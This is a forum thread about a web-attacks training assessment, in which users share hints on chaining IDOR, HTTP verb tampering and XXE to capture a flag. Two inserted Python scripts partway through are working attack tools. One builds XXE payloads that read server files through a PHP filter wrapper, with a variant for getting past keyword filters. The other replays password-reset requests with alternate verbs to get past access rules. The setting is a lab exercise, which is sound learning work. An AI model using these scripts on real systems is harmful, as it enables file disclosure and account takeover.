Academy Web Attacks Skills Assessment

Can somebody help me with the skills assessment? I discovered the XXE and I got it working, but I can't get any LFI no matter what payload I am using (the SYSTEM keyword seems blacklisted or something).
Thanks very much.

I think you should use a PHP wrapper to read the flag.

Hello bro, how do you do? Can you help me with this please? I found a way to reset users' passwords, but how can I use this with XXE?

Did you exploit IDOR vulnerability completely?
You have to detect the field where you can perform XXE (name, details, date), then use a PHP wrapper to read the flag; it's mentioned in previous sections.
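
The two replies above (read the flag through a PHP wrapper, in whichever of name/details/date is parsed as XML) boil down to one payload shape and one decoding step. The script below is an added example for this thread, not code from the assessment or from any poster: it builds an XXE document whose external entity is backed by `php://filter/convert.base64-encode/resource=...`, so the server returns the file base64-encoded instead of trying to parse PHP source as XML, and then pulls the base64 run out of whatever page echoes the field. The field name "details", the path "/flag.php" and the sample response are assumptions constructed for the example; the `PUBLIC` variant is the other entity syntax XML allows and resolves to the same URI, but nothing in the thread says whether the assessment's filter treats it differently from `SYSTEM`.

```python
import base64
import re

# Added example, not the assessment's code. Field name "details" and target
# path "/flag.php" are assumptions; the thread only says the vulnerable field
# is one of name/details/date and that a PHP wrapper reads the flag.


def build_xxe_payload(field: str, target: str, keyword: str = "SYSTEM") -> str:
    """Return an XML document with an external entity backed by php://filter.

    convert.base64-encode makes PHP hand the file back as base64, so PHP source
    (which would otherwise break the XML or be executed) survives the round trip.
    keyword selects the entity syntax: SYSTEM (usual) or PUBLIC, which carries a
    public identifier plus the same system URI and is loaded the same way.
    """
    uri = f"php://filter/convert.base64-encode/resource={target}"
    if keyword == "SYSTEM":
        decl = f'<!ENTITY xxe SYSTEM "{uri}">'
    elif keyword == "PUBLIC":
        decl = f'<!ENTITY xxe PUBLIC "-//XXE//EN" "{uri}">'
    else:
        raise ValueError("keyword must be SYSTEM or PUBLIC")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!DOCTYPE root [ {decl} ]>\n"
        f"<root><{field}>&xxe;</{field}></root>\n"
    )


# A base64 run long enough not to be an ordinary word; trailing padding optional.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_wrapped_file(response_body: str) -> str:
    """Decode the longest base64 run found wherever the app reflects the field.

    Returns "" when the response carries nothing decodable (e.g. an error page).
    """
    best = ""
    for match in _B64_RUN.finditer(response_body):
        if len(match.group(0)) > len(best):
            best = match.group(0)
    if not best:
        return ""
    padded = best + "=" * (-len(best) % 4)  # restore padding the app may strip
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return ""


# Constructed sample: a PHP file and a page that echoes the "details" field.
SAMPLE_FILE = "<?php\n$secret = 'constructed-sample-value';\n"
SAMPLE_RESPONSE = (
    '<div class="event"><b>Details:</b> '
    + base64.b64encode(SAMPLE_FILE.encode()).decode()
    + "</div>"
)


if __name__ == "__main__":
    print(build_xxe_payload("details", "/flag.php"))
    print(extract_wrapped_file(SAMPLE_RESPONSE))
```

Send the output of `build_xxe_payload` as the request body of the endpoint that parses XML, then feed the raw response to `extract_wrapped_file`; an `Access Denied` page decodes to an empty string, which is how a missing privilege shows up here rather than as a crash.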

Yes, I detected that it gives me id, username, fullname and company, but when I try to change them or add a new user it doesn't work. I also tried with the XXEinjector tool and static payloads, but it didn't get me anything.

First, you need to exploit the IDOR vuln and get a privileged user!
Next, exploit the XXE vuln with the right privileged user!
Note: the XXE vulnerability is the basic vuln in this case.


Oh man, thank you so much. I solved it. That was so fun. You are always my guide. Thank you, brother. Love you.


I can’t find a way to reset the passwords. Can you help?

IDOR vulnerability, bro.

what did you do for the XXE?

Thanks for the tips and hints, very valuable!

Do I understand correctly that without Cookie: PHPSESSID it will not be possible to change the administrator password?

The funny thing is, I have:
uid:
username:
token:
PHPSESSID=
But the password stubbornly does not want to be reset for the user.
Access Denied
Any hint what I'm doing wrong?
Resetting via request:
POST /reset.php

I am also blocked here


I actually got this. Not sure why though

@discovolante, not sure if you are both stuck on this same part. But look at what I have quoted here, take a look at the module topics again, and ask yourself if you have tried everything! The key to your issues lies in what I have quoted, solve that and you should be able to move on.

If that was too cryptic, then feel free to DM me.
-onthesauce


I am also stuck here. I have already got all 100 users and tokens, and one of them seems to be the administrator. The bad part is that the IDOR example in the module doesn't require authentication or a privilege escalation… :confused:

Don’t fall into a forum trap believing that the whole process of privilege escalation is IDOR! You may use IDOR to figure out all the information you need for the privilege escalation, but there were other concepts taught in the Web Attacks module that will help as well.


If anyone is stuck trying to change the admin password, don’t forget verb tampering!

However, once I can log into the admin account I'm stuck because I can't find where XML is being used. Am I blind and it's super obvious? Or do you have to try giving XML to different URIs and see what happens?
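
The verb-tampering hint above, and the earlier poster's `POST /reset.php` that keeps answering `Access Denied` despite a valid uid, token and PHPSESSID, describe the same situation: the deny rule is applied per HTTP method, so the same parameters sent with another verb reach the handler. The script below is an added example written for this thread, not code from the assessment or from any poster. It starts a constructed local stand-in whose deny rule covers only `POST` (an assumption about the shape of the real misconfiguration; the target's actual rule and parameter names beyond uid/token are not stated in the thread), then replays the reset request with each verb in turn and reports the first one the server accepts.

```python
import http.server
import threading
import urllib.error
import urllib.request
from urllib.parse import urlencode


class MockResetHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in: access control lists only POST, as with a
    <Limit POST> style rule. Assumption about the real target, not its code."""

    DENIED_VERBS = {"POST"}

    def _handle(self):
        length = int(self.headers.get("Content-Length") or 0)
        self.rfile.read(length)  # drain the body so the socket closes cleanly
        if self.path.split("?", 1)[0] != "/reset.php":
            status, body = 404, b"Not Found"
        elif self.command in self.DENIED_VERBS:
            status, body = 403, b"Access Denied"
        else:  # the handler itself never checks the verb
            status, body = 200, b"Password reset"
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = do_POST = do_PUT = do_PATCH = do_DELETE = _handle

    def log_message(self, *args):  # keep the example quiet
        pass


def start_mock_server():
    """Bind the mock on a free loopback port; returns (server, base_url)."""
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), MockResetHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def send_with_verb(url, verb, params, cookies=None):
    """Send one request with the given verb; returns (status, body)."""
    data = urlencode(params).encode()
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if cookies:  # e.g. "PHPSESSID=..." from the logged-in session
        headers["Cookie"] = cookies
    if verb in ("GET", "HEAD"):  # no body: carry the parameters in the query
        req = urllib.request.Request(url + "?" + data.decode(), method=verb, headers=headers)
    else:
        req = urllib.request.Request(url, data=data, method=verb, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def tamper_verbs(url, params, cookies=None,
                 verbs=("POST", "GET", "PUT", "PATCH", "DELETE")):
    """Replay the same parameters with every verb; returns {verb: (status, body)}."""
    return {verb: send_with_verb(url, verb, params, cookies) for verb in verbs}


def first_accepted(results):
    """Name the first verb that got past the deny rule, or None."""
    for verb, (status, body) in results.items():
        if status == 200 and "Access Denied" not in body:
            return verb
    return None


if __name__ == "__main__":
    server, base = start_mock_server()
    try:
        # Constructed parameters; the real uid/token come from the IDOR step.
        res = tamper_verbs(base + "/reset.php", {"uid": "1", "token": "example"})
        for verb, (status, body) in res.items():
            print(f"{verb:6} {status} {body}")
        print("accepted:", first_accepted(res))
    finally:
        server.shutdown()
        server.server_close()
```

Against a real target, swap `base` for the host, pass the session cookie through `cookies`, and read the whole results table rather than just the first hit: a 200 with the original error text still in the body is a deny, which is why `first_accepted` checks the body as well as the status.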

Try all the functions in the admin account. It's been a while, but I believe there were some extra calendar functions on the elevated account.


Finally mastered this module.
A decent assessment of skills.
(Thanks a lot to everyone for the mentoring.)